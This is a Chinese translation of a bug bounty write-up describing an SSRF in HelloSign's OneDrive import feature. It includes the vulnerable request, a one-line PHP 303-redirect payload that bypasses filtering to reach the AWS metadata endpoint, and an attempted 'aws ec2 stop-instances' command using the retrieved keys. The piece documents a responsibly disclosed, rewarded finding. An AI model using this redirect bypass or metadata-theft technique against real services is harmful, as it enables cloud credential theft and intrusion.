![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/10-1608195438.jpeg "[翻译]价值$4,913的SSRF | 我最高的赏金!")
嗨,大家好!
希望您一切安好,今天我要写一篇有关我最好的发现之一和有史以来最高的赏金的write-up。这是我在 Dropbox Bug Bounry计划 中发现的SSRF—服务器端请求伪造漏洞。
第一眼看,Dropbox计划对我来说非常有趣,因为它具有最佳的支付和及时的响应时间,因此我选择挖 Dropbox Bug赏金计划政策中提到的Hellosign。
我开始在app.hellosign.com上搜索主应用程序,发现了具有从Dropbox、GDrive、BOX、OneDrive、EverNote导入文档的功能。此时,SSRF已经进入到我脑海里,因此我从Dropbox导入功能开始,我看到了以下请求:
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/4-1608195439.png "[翻译]价值$4,913的SSRF | 我最高的赏金!")
我将file_reference参数的值更改为burp collaborator URL,但我得到404😫,这时我以为这里已经有SSRF保护了,我放弃并关闭了我的个人电脑。
在第二天,我有了新的想法,我想再次挖掘,并尝试使用OneDrive功能,并且看到了这个请求:
GET /attachment/externalFile?service_type=O&file_reference=MYONEDRIVEFILELINKHERE&file_name=FILENAME.ANYTHING&c=0.8261955039214062 HTTP/1.1
Host: app.hellosign.com
Connection: close
Accept: application/json
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36
X-CSRF-Token:
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: REDACTED
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8,hi;q=0.7
Cookie:REDACTED
您会看到上面请求的service_type参数值为O,这表示onedrive的请求是不同于第一个来自dropbox并且参数值为D的请求。现在,file_reference参数的值更改为我的collaborator链接,并且幸运的是,这次我获得了一个ping。
之后,在HelloSign上生成了一个PDF,其中包含我的collaborator页面的内容。这时我太开心了😍
现在我开始获取本地主机内容,首先我在whatismyipaddress.com上检查了他们正在使用哪个云服务,发现他们正在使用AWS/EC2,所以我尝试获取http://169.254.169.254/latest/,但是我获得了:-
404 Not Found
遗憾的是,请求没有通过,现在我尝试了http://127.0.0.1,它也得到了相同的响应。
现在我很伤心,但我试图通过Hackerone Hacktivity找到更多方法,并找到了这份GEM报告:- https://hackerone.com/reports/247680,其中报告者使用了303重定向来绕过SSRF保护。
我很快在服务器上托管了以下代码:-
<?php header('Location: http://169.254.169.254/latest/meta-data/', TRUE, 303); ?>
现在,我再次尝试使用服务器重定向链接,最后!!! 我得到了AWS Instance(Metadata)的内容😍😍😍
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/6-1608195441.png "[翻译]价值$4,913的SSRF | 我最高的赏金!")
现在我感到非常高兴和震惊,因为我在世界上最大最好的漏洞赏金计划之一上找到了完整的SSRF,让我能够从AWS元数据中检索所有内容,例如access_keys、token等。
我立即报告了该bug,并在3小时内获得了 Triaged ![[翻译]价值$4,913的SSRF | 我最高的赏金!](https://cn-sec.com/wp-content/themes/cn_sec/img/smilies/icon_smile.gif){kind=icon}
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/4-1608195443.png "[翻译]价值$4,913的SSRF | 我最高的赏金!")
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/10-1608195444.png "[翻译]价值$4,913的SSRF | 我最高的赏金!")
对我来说,这是最快乐的时刻。😄😄😄
现在,团队要求我检查是否可以进行RCE。我获得了访问密钥、token并尝试执行以下命令:- AWS ec2 stop-instances — instance-ids intsanceidhere ,但是由于该角色没有足够的权限执行该命令而无法正常工作。
但是我仍然很高兴,为Bounty感到兴奋。😙
最终,在第9天,Dropbox奖励了我4913美元。
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/7-1608195445.png "[翻译]价值$4,913的SSRF | 我最高的赏金!")
到现在为止,这是我的第一个SSRF和最高赏金。😄
如果您对本帖子有任何疑问和疑问,请通过Twitter(ehsayaan)与我联系。我的 DMs 始终处于打开状态。
小编提醒:可点击左下角阅读原文哦~
end
招新小广告
ChaMd5 Venom 招收大佬入圈
新成立组IOT+工控+样本分析 长期招新
![[翻译]价值$4,913的SSRF | 我最高的赏金!](http://cn-sec.com/wp-content/uploads/2020/12/5-1608195446.jpeg "[翻译]价值$4,913的SSRF | 我最高的赏金!")
本文始发于微信公众号(ChaMd5安全团队):[翻译]价值$4,913的SSRF | 我最高的赏金!
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论